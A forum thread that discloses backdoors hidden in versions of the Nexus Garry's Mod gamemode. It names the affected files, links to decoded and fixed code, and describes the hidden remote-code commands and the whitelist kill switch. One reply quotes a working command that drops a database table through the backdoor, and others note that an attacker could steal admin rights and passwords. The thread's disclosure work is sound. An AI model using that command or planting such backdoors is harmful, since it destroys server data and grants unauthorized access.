Nexus Exploits Megathread - Garry's Mod

This is a thread to point out all of the exploits in Nexus and their fixes. Major thanks to Polly for de-obfuscating all of this stuff because I'm lazy. There are most likely more backdoors/exploits, but these will be searched for tomorrow. [b]Nexus 3.1a[/b] [list] [*]Exploit(s) [list] [*]Serverside Runtime Code [list] [*]File(s) [list] [*]lua/includes/modules/json.lua [*]Nexus/gamemode/mounts/pickupobjects/sv_auto.lua [/list] [*]Ciphertext [list] [*][url]http://codepad.org/rBfnjI3j[/url] [/list] [*]Plaintext: [list] [*][url]http://codepad.org/PgmWhLBL[/url] [/list] [*]Fixed [list] [*][url]http://codepad.org/BomDZ95d[/url] [/list] [*]Info [list] [*]Disables a server if not found on the whitelist at [url]http://kurozael.com/whitelist.txt[/url]. [list] [*]Sets the password to 'kurozael' and hostname to 'SPEAK TO [email]KUROZAEL@GMAIL.COM[/email] TO AUTHORISATION.'. [/list] [/list] [/list] [/list] [/list] [b]Nexus 3.0e[/b] [list] [*]Exploit(s) [list] [*]Commands [list] [*]File(s) [list] [*]Nexus/gamemode/mounts/pickupobjects/entities/entities/nx_grab/sh_auto.lua [/list] [*]Ciphertext [list] [*][url]http://codepad.org/IEbCKuur[/url] [/list] [*]Plaintext [list] [*][url]http://codepad.org/QIJEkdXy[/url] [/list] [*]Fixed [list] [*][url]http://codepad.org/GXK7XWY7[/url] [/list] [*]Info [list] [*]Allows a player to run the command 'basic lua' [list] [*]A call to _G[ "RunString" ] [/list] [*]Allows a player to run the command 'basic comm' [list] [*]A call to game.ConsoleCommand [/list] [/list] [/list] [/list] [/list] Brought to you by Polly ( raBBish ) and Helix ( Helix Alioth ).

How do you manage to decompile/crAck that code, lol

They're actually not that hard to find. I removed the one in nexus3(the old exploit, not basic) a few weeks ago (before kuro removed it himself) and also found the backdoor in 3e and decided not to upgrade. They all use the same types of ways to hide the code. -Edit- Also the newest one is not really a backdoor, it's more piracy protection with a backdoor for those who illegitimately received the customer only script (Nexus 3.1 was supposed to be customer only, it seems).

Kurosawa(-- lol auto corrector) kinda fails then for placing the newest backdoor a few folders behind the old one.

Kuropixel didn't count on the domain going down.

If his domain is down don't that mean any customers servers with the /whitelist.txt code are down too?

All the customer servers are up.

[QUOTE=Boilrig;22818086]All the customer servers are up.[/QUOTE] Cause Kuro hasn't given any customers Nexus 3.1 yet. Although now that his website is down, so is his own server, [url]http://www.gametracker.com/server_info/91.192.210.198:27017/[/url] I believe that sums up, epic fail.

[QUOTE=Helix Alioth;22815605]Brought to you by Polly ( raBBish ) and Helix ( Helix Alioth ).[/QUOTE] :cawg: [editline]12:38PM[/editline] why are people trying to remove every backdoor in the script when they say it's shit

Customer servers are down, including Kuro's server himself at the moment.

[QUOTE=deggemannen;22820716]:cawg: [editline]12:38PM[/editline] why are people trying to remove every backdoor in the script when they say it's shit[/QUOTE] Because I'm bored and have nothing else to do? v:v:v I don't like backdoors of any kind.

[QUOTE=Helix Alioth;22815605]Major thanks to Polly for de-obfuscating all of this stuff because I'm lazy.[/QUOTE] Don't mind me for publishing the first one.. :v

[QUOTE=raBBish;22821197]Because I'm bored and have nothing else to do? v:v:v I don't like backdoors of any kind.[/QUOTE] Even literal back doors? I would find it hard getting out of your house :S.

[QUOTE=sintwin;22822238]Even literal back doors? I would find it hard getting out of your house :S.[/QUOTE] We only have two front doors :v:

[QUOTE=sintwin;22822238]Even literal back doors? I would find it hard getting out of your house :S.[/QUOTE] This guy has never heard of a front door before

[QUOTE=Nemesis036;22829679]This guy has never heard of a front door before[/QUOTE] What if you have a garden then.

[QUOTE=raBBish;22821197]Because I'm bored and have nothing else to do? v:v:v I don't like backdoors of any kind.[/QUOTE] For the last time, the code in 3.1 (the customer version of the script) is/was not really a backdoor; it was piracy prevention. I dislike people misunderstanding what code does. Yes, it locks and changes the name of your server, but only if you downloaded the code in an illegitimate manner. Solution: Use only versions of nexus that are actually meant for the general public (After removing their own backdoors of course).

[QUOTE=Spyfox5400;22831086]For the last time, the code in 3.1 (the customer version of the script) is/was not really a backdoor; it was piracy prevention. I dislike people misunderstanding what code does. Yes, it locks and changes the name of your server, but only if you downloaded the code in an illegitimate manner. Solution: Use only versions of nexus that are actually meant for the general public (After removing their own backdoors of course).[/QUOTE] I've already stated this once or twice. No, changing password and host name doesn't count as a back door. [quote=Princeton] back door: an undocumented way to get access to a computer system or the data it contains[/quote] An undocumented console command that allows you to run Lua scripts or console commands on the server? Definitely a back door. Even if it's meant to prevent piracy, it's still a back door. Is that clear now?

[QUOTE=Spyfox5400;22831086]For the last time, the code in 3.1 (the customer version of the script) is/was not really a backdoor; it was piracy prevention. I dislike people misunderstanding what code does. Yes, it locks and changes the name of your server, but only if you downloaded the code in an illegitimate manner. Solution: Use only versions of nexus that are actually meant for the general public (After removing their own backdoors of course).[/QUOTE] Or just use the "customer" version after removing the shit security anyway as charging for a gamemode is fucking pathetic.

[QUOTE=hexpunK;22832507]Or just use the "customer" version after removing the shit security anyway as charging for a gamemode is fucking pathetic.[/QUOTE] Yes, I agree. However just because you disagree with how something is run (as in him selling the gamemodes), does not make it ethical to use a leaked gamemode and remove his piracy protection code. Also, again I will state, yes it's a backdoor but the harm that can actually be done with that backdoor is minuscule. In all honesty it really can't do that much on a LOCKED server. Anything you do using the lua commands is placed into volatile memory and disappears on restart. In addition using console commands really only does anything for the time that the server is up. And again, they are ONLY active on servers that are using the illegitimately obtained script. I.E. not on the licensed ones. Plus what's anyone going to do with a backdoor on a passworded server? Wreak havoc on the single player that is there?

Well, if it wasn't passworded then yeah, they become a problem. But doesn't the server console have the ability to read/ write files in the filesystem? I can't remember now...

Add themselves as admins, get RCon password (not sure if you can still read server.cfg) and get MySQL password for example. [editline]12:55AM[/editline] And there's bound to be back doors in the modules, and with C++ you can do pretty much anything.

As much as Kuroscript is good and how two wrongs don't make a right, if Kuro insists on adding backdoors to public versions of his code then he deserves his 'P2P' gamemode to be leaked and cracked. Respect can only be earnt, he did the opposite.

[QUOTE=Spyfox5400;22833440]Yes, I agree. However just because you disagree with how something is run (as in him selling the gamemodes), does not make it ethical to use a leaked gamemode and remove his piracy protection code. Also, again I will state, yes it's a backdoor but the harm that can actually be done with that backdoor is minuscule. In all honesty it really can't do that much on a LOCKED server. Anything you do using the lua commands is placed into volatile memory and disappears on restart. In addition using console commands really only does anything for the time that the server is up. And again, they are ONLY active on servers that are using the illegitimately obtained script. I.E. not on the licensed ones. Plus what's anyone going to do with a backdoor on a passworded server? Wreak havoc on the single player that is there?[/QUOTE] You could use the basic lua command to delete all of the mysql database. That would have a huge affect seen as it would delete everyones characters and items.

Or just fuck the whole server to no end

[QUOTE=sintwin;22834964]You could use the basic lua command to delete all of the mysql database. That would have a huge effect seen as it would delete everyones characters and items.[/QUOTE] We're talking about the new stuff that kuro put in, not basic. I don't dispute the fact that the things in the earlier versions were clearly exploitable backdoors. I'm merely stating that people shouldn't be able to exploit with 3.1 as once you notice it is locked and passworded, anyone with half of a brain would know to take it offline. So while it is a backdoor, it only affects those who use it illegitimately, and on those not smart enough to take their server offline once they realize that it has been compromised by them using an illegitimately obtained gamemode. I do wonder if he actually also put backdoors in the .dll files, as if there really were backdoors in there, why would he bother continuously updating the lua backdoors? (Maybe he did, maybe he didn't I really don't know, just wondering why he would bother updating the other backdoors.) Plus rabbish, even though you /can/ do all those things (I don't dispute that fact that there are some malicious things that can be done), the server operator would immediately know if you were as the server would be both locked (and only those who know the exploits know the password) and those commands require access to the server for them to be executed. -Edit- What good does it do to give yourself admin on a locked server? lol.

Let me ask you something.. How does one remove the back door? hmmm? I really have no clue! lol what can i say... im simple jack, i try to catch butterflies with a wooden mallet. SO yea someone help a brother out Oh yea and im not a good read, what so ever!

[QUOTE=Spyfox5400;22836402]We're talking about the new stuff that kuro put in, not basic. [/quote] "auth_main l sql.Query([[DROP TABLE <somename>]])" works in 3.1a [QUOTE=Spyfox5400;22836402]I don't dispute the fact that the things in the earlier versions were clearly exploitable backdoors. I'm merely stating that people shouldn't be able to exploit with 3.1 as once you notice it is locked and passworded, anyone with half of a brain would know to take it offline. So while it is a backdoor, it only affects those who use it illegitimately, and on those not smart enough to take their server offline once they realize that it has been compromised by them using an illegitimately obtained gamemode.[/quote] People with more than half a brain would check here for the fixes. (No offense to the user above :v:) Anyways, I don't like people selling Lua scripts, and I don't care whether you got the gamemode legitimately or not. I doubt anyone is getting hurt if I post fixes to Kuro's back doors. Also, you can't really rely on Kuro ($300, no proper contract), he could remove a server from the white list without getting into any trouble. Legitimate customers would suffer. [QUOTE=Spyfox5400;22836402] I do wonder if he actually also put backdoors in the .dll files, as if there really were backdoors in there, why would he bother continuously updating the lua backdoors? (Maybe he did, maybe he didn't I really don't know, just wondering why he would bother updating the other backdoors.)[/quote] If this was my gamemode I was leaking by purpose (come on, it's too obvious...) I'd put back doors in the modules, C++ gives way more power than Lua. [QUOTE=Spyfox5400;22836402] Plus rabbish, even though you /can/ do all those things (I don't dispute that fact that there are some malicious things that can be done), the server operator would immediately know if you were as the server would be both locked (and only those who know the exploits know the password) and those commands require access to the server for them to be executed. [/quote] This is true, but considering 50% of GMod servers are ran by idiots (I know, understatement :v:), there's plenty of servers where you could do this stuff without being noticed. [QUOTE=Spyfox5400;22836402] -Edit- What good does it do to give yourself admin on a locked server? lol.[/QUOTE] Only people with less than half a brain would re-install their server if someone sets the password. In most cases users.txt or whatever admin mod they use will stay untouched when the servers opens again. So you'd still have admin rights when it's open again.

How do you get this Rp? Or.. you cant? I really never check for gamemodes and only used darkrp

[QUOTE=raBBish;22837019]"auth_main l sql.Query([[DROP TABLE <somename>]])" works in 3.1a People with more than half a brain would check here for the fixes. (No offense to the user above :v:) Anyways, I don't like people selling Lua scripts, and I don't care whether you got the gamemode legitimately or not. I doubt anyone is getting hurt if I post fixes to Kuro's back doors. Also, you can't really rely on Kuro ($300, no proper contract), he could remove a server from the white list without getting into any trouble. Legitimate customers would suffer. If this was my gamemode I was leaking by purpose (come on, it's too obvious...) I'd put back doors in the modules, C++ gives way more power than Lua. This is true, but considering 50% of GMod servers are ran by idiots (I know, understatement :v:), there's plenty of servers where you could do this stuff without being noticed. Only people with less than half a brain would re-install their server if someone sets the password. In most cases users.txt or whatever admin mod they use will stay untouched when the servers opens again. So you'd still have admin rights when it's open again.[/QUOTE] Lol this is such a silly argument (on both of our parts). Ehh... I was really just trying to point out that it's more of something that you'd have to be pretty stupid to not stop using that gamemode (or at least shut down your server, which would render the backdoor useless) when you find that it locks your server. But of course like you said, a lot of the people that run gmod servers do have half a brain.